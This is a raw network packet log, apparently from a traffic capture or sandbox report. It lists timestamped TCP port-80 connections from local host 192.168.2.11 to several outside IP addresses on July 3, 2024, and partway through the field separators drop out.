                  Jul 3, 2024 10:51:20.319772959 CEST | 49722 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:20.326147079 CEST | 80 | 49722 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:20.327563047 CEST | 80 | 49722 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:21.823606014 CEST | 49722 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:21.828876019 CEST | 80 | 49722 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:21.828933954 CEST | 49722 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:22.842020035 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:22.984025002 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:22.984213114 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:22.986321926 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:22.991138935 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.760766983 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.760817051 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.760827065 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.760970116 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761044025 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761199951 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.761285067 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761296988 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761349916 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.761578083 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761723995 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761734962 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.761770964 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.761784077 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.766108990 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.766210079 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.766221046 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.766292095 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.766551018 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.766638041 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.766671896 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.851686954 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.851752996 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.851803064 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:28.851950884 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.855115891 CEST | 49723 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:28.860038996 CEST | 80 | 49723 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:50.845932007 CEST | 49724 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:50.850750923 CEST | 80 | 49724 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:50.850856066 CEST | 49724 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:50.852684021 CEST | 49724 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:50.857475996 CEST | 80 | 49724 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:51.365811110 CEST | 80 | 49724 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:51.367949009 CEST | 80 | 49724 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:51.370549917 CEST | 49724 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:52.354875088 CEST | 49724 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:53.374521017 CEST | 49725 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:53.379434109 CEST | 80 | 49725 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:53.382668018 CEST | 49725 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:53.386491060 CEST | 49725 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:53.391386986 CEST | 80 | 49725 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:53.889050007 CEST | 80 | 49725 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:53.889533997 CEST | 80 | 49725 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:53.892594099 CEST | 49725 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:54.886065960 CEST | 49725 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:55.905515909 CEST | 49726 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:55.910428047 CEST | 80 | 49726 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:55.910499096 CEST | 49726 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:55.912646055 CEST | 49726 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:55.918047905 CEST | 80 | 49726 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:55.918601990 CEST | 80 | 49726 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:56.438339949 CEST | 80 | 49726 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:56.438378096 CEST | 80 | 49726 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:56.438426971 CEST | 49726 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:57.417501926 CEST | 49726 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.437072992 CEST | 49727 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.441874027 CEST | 80 | 49727 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:58.441946030 CEST | 49727 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.444401979 CEST | 49727 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.449228048 CEST | 80 | 49727 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:58.945667028 CEST | 80 | 49727 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:58.945930004 CEST | 80 | 49727 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:51:58.948952913 CEST | 49727 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.948952913 CEST | 49727 | 80 | 192.168.2.11 | 162.209.189.210
                  Jul 3, 2024 10:51:58.953773022 CEST | 80 | 49727 | 162.209.189.210 | 192.168.2.11
                  Jul 3, 2024 10:52:04.420392990 CEST | 49728 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:04.426670074 CEST | 80 | 49728 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:04.426742077 CEST | 49728 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:04.428543091 CEST | 49728 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:04.434457064 CEST | 80 | 49728 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:05.063060045 CEST | 80 | 49728 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:05.063435078 CEST | 80 | 49728 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:05.063558102 CEST | 49728 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:05.932847023 CEST | 49728 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:06.954493046 CEST | 49729 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:06.959460020 CEST | 80 | 49729 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:06.959765911 CEST | 49729 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:06.961721897 CEST | 49729 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:06.968946934 CEST | 80 | 49729 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:07.586397886 CEST | 80 | 49729 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:07.586622000 CEST | 80 | 49729 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:07.587896109 CEST | 49729 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:08.464365005 CEST | 49729 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:09.482489109 CEST | 49730 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:09.493361950 CEST | 80 | 49730 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:09.493510008 CEST | 49730 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:09.495687962 CEST | 49730 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:09.500611067 CEST | 80 | 49730 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:09.500991106 CEST | 80 | 49730 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:10.833755016 CEST | 80 | 49730 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:10.833805084 CEST | 80 | 49730 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:10.833890915 CEST | 49730 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:11.014492035 CEST | 49730 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.030917883 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.035924911 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.036015034 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.038404942 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.043349028 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781395912 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781436920 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781450987 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781500101 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.781872988 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781886101 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781896114 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781908035 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.781912088 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.781991005 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.782574892 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.782594919 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.782608032 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.782617092 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.782654047 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.788069010 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.788084984 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.788177013 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.876468897 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.876492023 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.876506090 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.876600027 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.876725912 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.876775980 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.881222010 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.881234884 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.881407022 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.881414890 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.882404089 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.882468939 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.886184931 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.886198044 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.886374950 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.886485100 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.886497974 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.886508942 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:12.886540890 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.886567116 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.892467976 CEST | 49731 | 80 | 192.168.2.11 | 198.16.50.172
                  Jul 3, 2024 10:52:12.905581951 CEST | 80 | 49731 | 198.16.50.172 | 192.168.2.11
                  Jul 3, 2024 10:52:26.014333963 CEST | 49732 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:26.021358013 CEST | 80 | 49732 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:26.021456003 CEST | 49732 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:26.024961948 CEST | 49732 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:26.033507109 CEST | 80 | 49732 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:26.483020067 CEST | 80 | 49732 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:26.483139992 CEST | 49732 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:27.542521954 CEST | 49732 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:27.547564030 CEST | 80 | 49732 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:28.562794924 CEST | 49733 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:28.568396091 CEST | 80 | 49733 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:28.568465948 CEST | 49733 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:28.571625948 CEST | 49733 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:28.577235937 CEST | 80 | 49733 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:29.164763927 CEST | 80 | 49733 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:29.165123940 CEST | 49733 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:30.073715925 CEST | 49733 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:30.078578949 CEST | 80 | 49733 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:31.094521999 CEST | 49734 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:31.100665092 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:31.108525991 CEST | 49734 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:31.108525991 CEST | 49734 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:31.115392923 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:31.115442038 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:31.568572998 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:31.574634075 CEST | 49734 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:32.620527029 CEST | 49734 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:32.627470016 CEST | 80 | 49734 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:33.642508030 CEST | 49735 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:33.647485018 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:33.652359962 CEST | 49735 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:33.652359962 CEST | 49735 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:33.657286882 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:34.128894091 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:34.128930092 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:34.129100084 CEST | 49735 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:34.132029057 CEST | 49735 | 80 | 192.168.2.11 | 3.33.130.190
                  Jul 3, 2024 10:52:34.136936903 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.11
                  Jul 3, 2024 10:52:48.358494997 CEST | 49736 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:48.363527060 CEST | 80 | 49736 | 217.116.0.191 | 192.168.2.11
                  Jul 3, 2024 10:52:48.363629103 CEST | 49736 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:48.365706921 CEST | 49736 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:48.372061968 CEST | 80 | 49736 | 217.116.0.191 | 192.168.2.11
                  Jul 3, 2024 10:52:49.065510988 CEST | 80 | 49736 | 217.116.0.191 | 192.168.2.11
                  Jul 3, 2024 10:52:49.065543890 CEST | 80 | 49736 | 217.116.0.191 | 192.168.2.11
                  Jul 3, 2024 10:52:49.065717936 CEST | 49736 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:49.870400906 CEST | 49736 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:50.890610933 CEST | 49737 | 80 | 192.168.2.11 | 217.116.0.191
                  Jul 3, 2024 10:52:51.498440981 CEST8049737217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:51.498594999 CEST4973780192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:51.500430107 CEST4973780192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:51.505335093 CEST8049737217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:52.208338976 CEST8049737217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:52.210405111 CEST8049737217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:52.210460901 CEST4973780192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:53.027582884 CEST4973780192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:54.045886993 CEST4973880192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:54.050823927 CEST8049738217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:54.050887108 CEST4973880192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:54.053241968 CEST4973880192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:54.058208942 CEST8049738217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:54.058219910 CEST8049738217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:54.739522934 CEST8049738217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:54.739626884 CEST8049738217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:54.739670038 CEST4973880192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:55.560388088 CEST4973880192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:56.577119112 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:56.582166910 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:56.582238913 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:56.584433079 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:56.589251041 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:57.292973995 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:57.293029070 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:57.293292999 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:57.295176029 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:52:57.295365095 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:57.296083927 CEST4973980192.168.2.11217.116.0.191
                  Jul 3, 2024 10:52:57.300870895 CEST8049739217.116.0.191192.168.2.11
                  Jul 3, 2024 10:53:02.546586990 CEST4974080192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:02.551498890 CEST8049740165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:02.551707029 CEST4974080192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:02.553823948 CEST4974080192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:02.558949947 CEST8049740165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:03.451106071 CEST8049740165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:03.451385975 CEST8049740165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:03.451533079 CEST4974080192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:04.058007956 CEST4974080192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:05.076381922 CEST4974180192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:05.081490040 CEST8049741165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:05.085036039 CEST4974180192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:05.088560104 CEST4974180192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:05.093473911 CEST8049741165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:05.969374895 CEST8049741165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:05.969923019 CEST8049741165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:05.972660065 CEST4974180192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:06.589138985 CEST4974180192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:07.608556032 CEST4974280192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:07.613579035 CEST8049742165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:07.613667965 CEST4974280192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:07.618547916 CEST4974280192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:07.623406887 CEST8049742165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:07.623545885 CEST8049742165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:08.500189066 CEST8049742165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:08.500207901 CEST8049742165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:08.500262022 CEST4974280192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:09.120533943 CEST4974280192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:10.140464067 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:10.145339012 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:10.145436049 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:10.147753954 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:10.152555943 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.018973112 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.019012928 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.019083023 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:11.019160986 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.019174099 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.019268990 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:11.019377947 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:11.019517899 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:11.022180080 CEST4974380192.168.2.11165.154.0.120
                  Jul 3, 2024 10:53:11.027059078 CEST8049743165.154.0.120192.168.2.11
                  Jul 3, 2024 10:53:16.900053978 CEST4974480192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:16.908268929 CEST8049744121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:16.908356905 CEST4974480192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:16.910839081 CEST4974480192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:16.915786982 CEST8049744121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:17.866528988 CEST8049744121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:17.866545916 CEST8049744121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:17.866559982 CEST8049744121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:17.866676092 CEST4974480192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:18.417325974 CEST4974480192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:19.435556889 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:19.440685034 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:19.440802097 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:19.442528009 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:19.447474003 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:20.555830002 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:20.555869102 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:20.555882931 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:20.555902004 CEST8049745121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:20.555923939 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:20.555957079 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:20.948606014 CEST4974580192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:21.967287064 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:21.972210884 CEST8049746121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:21.972341061 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:21.974477053 CEST4974680192.168.2.11121.37.199.72
                  Jul 3, 2024 10:53:21.980026007 CEST8049746121.37.199.72192.168.2.11
                  Jul 3, 2024 10:53:21.980047941 CEST8049746121.37.199.72192.168.2.11
